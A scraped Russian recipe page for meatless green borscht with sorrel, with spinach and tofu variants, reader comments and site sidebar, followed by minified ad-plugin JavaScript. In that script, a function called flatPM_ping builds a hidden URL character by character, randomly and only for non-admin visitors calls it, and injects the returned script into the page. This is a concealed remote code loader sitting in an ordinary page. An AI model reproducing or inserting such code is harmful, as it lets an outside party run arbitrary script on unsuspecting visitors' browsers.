Зеленый борщ без мяса рецепт

Как приготовить правильный украинский зеленый борщ без мяса со щавелем (вкусный рецепт приготовления с фото)?

Описание

Зеленый борщ – блюдо колоритное, являющееся исконно украинским. История его существования насчитывает уже не одну сотню лет. И как наши предки с удовольствием готовили и ели его, точно также и мы готовим и едим его.

Но что же является причиной такой гастрономической любви украинцев к этому блюду?

Прежде всего, оно весьма и весьма вкусное. Кроме того оно очень полезное. Его основной компонент – щавель, который богат витаминами А, С, К, В1, В2, РР, Е и полезными микроэлементами, такими как: калий, железо, цинк, магний, медь, натрий, никель, стронций, фтор. Потому неудивительно, что блюдо приготовленное, на щавеле будет иметь благотворное влияние на общее состояние организма. Кроме того готовят этот борщ без мяса, а потому исключив из него и еще такой компонент как куриое яйцо, его можно будет трансформировать в постное кушанье.

В общем, украинский зеленый борщ – это настоящий кладезь витаминов и микроэлементов!

Готовить данное блюдо очень просто, а тем более следуя подробным инструкциям, приведенным ниже в пошаговом фото рецепте!

Ингредиенты


  • Вода
    (1,5 л)

  • Картофель
    (2 шт.)

  • Лавровый лист
    (1 шт.)

  • Лук репчатый
    (1 шт.)

  • Морковь
    (1 шт.)

  • Сметана
    (по вкусу)

  • Щавель
    (2 чашки)

  • Куриное яйцо
    (3 шт.)

  • Растительное масло
    (2 ст.л.)

  • Укроп
    (по вкусу)

  • Пищевая соль
    (по вкусу)

  • Перец черный молотый
    (по вкусу)

Шаги приготовления

Начнем с подготовки овощей. Прежде всего, очистим картофель, морковь и лук. Затем нарежем их кубиками среднего размера.

Теперь необходимо немного поджарить морковку и лук. Для этого нальем пару столовых ложек растительного масла на дно кастрюли и разогреем его. Затем опустим туда лук и морковку и обжарим их на медленном огне в течение пяти минут.

После того, как мы обжарили лук и морковку, добавим в кастрюлю воды и доведем ее до кипения. Не забывайте убирать образующуюся пенку!

Добавим в наш зеленый борщ картофель и проварим его до состояния готовности (15 – 20 минут).

На этом же этапе борщ нужно подсолить, поперчить и добавить в него лавровый лист.

На данном этапе следует заняться подготовкой щавеля. Его нужно хорошо вымыть и мелко нашинковать.

Теперь щавель можно добавить в кастрюлю с борщом. Его проварить необходимо не менее 5-7 минут. Вместе со щавелем следует добавить и остальную мелко нарубленную зелень.

Пока зеленый борщ доходит на плите, можно заняться приготовлением яиц. Их нужно отварить вкрутую, а затем нарезать небольшими кубиками.

Подавать к столу украинский зеленый борщ без мяса со щавелем необходимо, добавив в него яйца и заправив сметаной. Украсить же данное блюдо можно веточкой зелени.

Зеленый борщ без мяса рецепт

Ингредиенты

ИНГРИДИЕНТЫ МАССА КАЛОРИЙНОСТЬ (ккал. на 100 гр.)
Картофель 2 шт. 77
Лук репчатый 1 шт. 40
Морковь 1 шт. 41
Сметана по вкусу 206
Щавель 1 пучок 19
Куриное яйцо 3 шт. 155
Растительное масло 2 ст. л. 884
Перец черный молотый по вкусу
Лавровый лист 1 шт.
Соль по вкусу
Укроп по вкусу
Вода 1,5 л.

Пошаговый рецепт приготовления Зеленый борщ без мяса с фото

А готовится кушанье так:

    Сразу подготовим овощи. Почистите картошку, морковку, лук. Овощи нарежьте средними кубиками.

А сейчас отправьте обжариваться лук, морковь на растительном масле.

Поставьте емкость с водой на огонь, вскипятите, отправьте сюда же обжаренные овощи, картофельные кубики, варите все вместе 20 минут. Обязательно посолите, поперчите бульон, а также добавьте лавровый лист.

Видеорецепт Зеленый борщ без мяса

Диетический зеленый борщ со шпинатом

А еще можно побаловать своих домочадцев легким обедом или ужином и приготовить для них диетический зеленый борщ со шпинатом!

Итак, для того чтобы приготовить кушанье по этому рецепту вам понадобится:

Ингредиенты:
картошка – 5 шт.;
яйца – 3 шт.;
морковка – 1 шт.;
лук – 1 шт.;
замороженный шпинат – 400 г;
соль, базилик, куркума, укроп, лавровый лист в меленом виде – по вкусу.

А готовится кушанье так:

    Почистите картошку, нарежьте в виде соломки, отправьте отвариваться в кипящую подсоленную воду.

Очистите с лука шелуху, измельчите лук, морковку потрите на терке.

Достаньте шпинат из морозильной камеры.

Отварите яйца, остудите, почистите, а потом нарежьте в виде крупных кусочков.

В емкость с готовой картошкой отправьте морковку, лук со шпинатом. Сюда же капните немного сока лимона или всыпьте лимонную кислоту, чтобы придать блюду кислинку.

  • Теперь приправьте кушанье специями, добавьте сюда же яйца, через три минуты отключите огонь, вкусный, диетический борщ готов!
  • Зеленый борщ без мяса рецепт

    В эти выходные почти такие же зеленые щи сварил себе мой сын. Он только яйца не варил, заправил немного майонезом. Помогала я ему немного совсем.

    Светлана, вам очень повезло с таким помощником. Голодным уже не будет, а значит и вы при нем всегда сытыми и довольными будете :))) А вашему помощнику сколько лет?
    Я, кстати, для густоты и насыщенности иногда чуть манки подсыпаю. Суп такой тягучий становится!

    12 . И он действительно никогда не останется голодным. Сварит сосиски, сделает себе бутерброды.

    Светлана, нам до вас еще расти :))) Мой пока любит хорошо покушать, но без мамы один себе ничего не сделает 🙂

    У сына всегда был интерес к кулинарии. Рвался помогать, тесто помесить. Один раз помог с эклерами, ни один не поднялся! Но я его все равно не прогоняю, пусть учится. Мужчине такое умение тоже пригодится.

    Я восхищаюсь мужчинами, которые умеют и любят готовить! Правильные качества прививаете, Светлана. Кому-то такой мужичок достанется.

    Оставьте свое мнение Отменить ответ

    Посетители

    Вконтакте

    Свежие комментарии

    • Mara к записи Творожные булочки с корицей
    • Леся к записи Тонкие блины на кефире с дырочками
    • Ирина́ к записи Нежный салат из моркови с яйцом и сыром
    • Elena к записи Хрустящее куриное филе в кляре на сковороде
    • Ирина к записи Простой и быстрый слоеный луковый пирог

    Самые рейтинговые рецепты

    • Самый вкусный салат с кальмарами (5,00 из 5)
    • Нежный и вкусный салат «Мимоза» с горбушей (5,00 из 5)
    • Самый вкусный новогодний салат Оливье с курицей (5,00 из 5)
    • Необычная закуска – спринг-роллы с курицей (5,00 из 5)
    • Сочная свинина, запеченная в духовке с горчицей (5,00 из 5)
    • Вкусный лаваш с яйцом и сыром на сковороде (5,00 из 5)
    • Вкусный рулет из лаваша с рыбой и творожным сыром — супер закуска для праздничного стола (5,00 из 5)
    • Праздничный салат из курицы со свеклой, черносливом и орехами (5,00 из 5)

    Copyright © 2008 – 2017 Кулинарные рецепты повседневных и праздничных блюд. Любая перепечатка и использование материалов разрешается только с согласия автора.

    Зеленый борщ с щавелем без мяса

    Рецепт зеленого борща с щавелем – прекрасное весеннее первое блюдо, которое на столько вкусное, насыщенное и свежее, что запросто готовится без мяса. А еще такой борщ-суп можно приготовить очень быстро – буквально 30-40 минут, и он готов.

    Ингредиенты для приготовления зеленого борща

    • Вода (или овощной бульон) – 3 литра
    • Картошка – 3 средних шт.
    • Морковь – 1 большая шт.
    • Капуста белокочанная – ¼ часть небольшого велка
    • Капуста пекинская (не обязательно) – 2 см. со стороны плодоножки
    • Сыр адыгейский или тофу – 150 гр.
    • Соевое мясо для гуляша (по желанию) – 1 упаковка
    • Щавель – 2 больших пучка
    • Петрушка, укроп – по 1му хорошему пучку каждого
    • Специи – лавровый лист, черный перец, асафетида (по желанию)
    • Черная индийская соль – по желанию
    • Растительное масло -2 ст. ложки
    • Сливочное масло – 1 ст. ложка

    Как приготовить зеленый борщ со щавелем дома – пошаговый рецепт с фото

    Зажарка для зеленого борща без лука

    Зажарку для зеленого борща можно делать по желанию, но с ней борщ получается гораздо насыщеннее по вкусу.

  1. Морковку очистить и потереть на мелкой терке.
  2. Пекинскую капусту, ту часть, которая ближе к плодоножке, на салаты не идет и обычно выбрасывается, порубить мелко кубиками как лук.
  3. На сковороде разогреть растительное масло и добавить половину тертой моркови и порезанную пекинскую капусту.
  4. Добавить асафетиду (по желанию) на кончике ножа и обжаривать иногда помешивая в течение 3-5 минут до готовности.

Как сварить зеленый борщ

  1. Налить в кастрюлю воду или заранее приготовленный овощной бульон и поставить нагреваться. Добавить несколько листиков лаврового листа и ¼ чайной ложки свежемолотого черного перца.
  2. Пока вода греется почистить картошку и порезать её на небольшие кубики.
  3. До закипания воды в кастрюлю добавить оставшуюся половину тертой моркови, если вы делали зажарку, или всю тертую морковь – если её не делали.
  4. Как только вода в кастрюлю также добавить порезанную кубиками картошку. Варить на среднем огне.
  5. Тонко нашинковать белокачанную капусту. Добавить её к зеленому борщу через 5 минут после картошки.
  6. Промыть щавель и зелень укропа и петрушки. Все мелко нарезать.
  7. Порезать кубиками адыгейский сыр или тофу и поджарить его на сковороде со сливочным маслом, добавив черную индийскую соль.
  8. В борщ добавить соевое мясо для гуляша, если вы решили его использовать. Добавлять его через 5 минут после того, как добавили капусту.
  9. Также добавить в борщ приготовленную зажарку из моркови и пекинской капусты.
  10. Посолите зеленый борщ по вкусу.
  11. Как только все ингредиенты готовы или через 5 минут после добавления последнего ингредиента выключите борщ.
  12. Добавьте в зеленый борщ щавель, укроп, петрушку и поджаренный сыр. Хорошо перемешайте борщ.
  13. Закройте кастрюлю крышкой и дайте своему зеленому борщу настояться в течение 10-15 минут.

Ваш сытный и вкусный зеленый борщ с щавелем готов!

Читайте также

Комментарии и отзывы (8)

Надежда

Спасибо за рецепт. Очень кстати и своевременно. Как раз все ингредиенты для борща есть!

Ирина

Надежда, спасибо за отзыв — сезон, все таки. Щавель полным ходом, что же еще кушать как не зеленый борщик. Легко, полезно и вкусно!

Аноним

Спасибо за такой подробный рецепт! А мы еще любим в борщ (и в красный, и зеленый) добавлять сметану — мммм как вкусно получается. Раньше как-то не добавляли, а сейчас распробовали…

Ирина

зеленый борщ со сметаной — это же классика жанра 🙂

Ирина

на днях сделала зеленый борщ за полчаса. Решила его просто не зажаривать ничем, а бросила все овощи сырыми. А еще и молодого шпината добавила. Получилось очень-очень вкусно. Так что вкусный зеленый борщ без зажарки это очень даже реально. Единственный секрет когда вариш супы и борщзи без зажарки — это добавить столовую ложку или две сливочного масла перед выключением готового продукта — масло придает очень приятный и насыщенный аромат и компенсирует отсутствие зажарки.
И еще из экспериментов — вместо соевого мяса и адыгейского сыра мы поджарили кусочки сыра тофу до золотистой корочки и бросили его в борщ незадолго до готовности. Получилось очень-очень вкусно. Это теперь любимый вариант зеленового борща в моей семье.

Катюшка

Спасибо вам за рецепт зеленого борща. Все делала в точности как вы написали. Получилось ну очень вкусно, свекровь даже удивилась, что это я готовила )) очень меня вдохновил результат, теперь буду что-то новое готовить по вашим прекрасным рецептам .

Ирина

Катюшка, пожалуйста! Очень рада, что все получилось, и что результат понравился. Такие отзывы вдохновляют делиться рецептами 🙂

Алена Кузьменко

Очень вкусный борщ получился, спасибо. делала без зажарки, так как времени было мало, но всем понравился.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};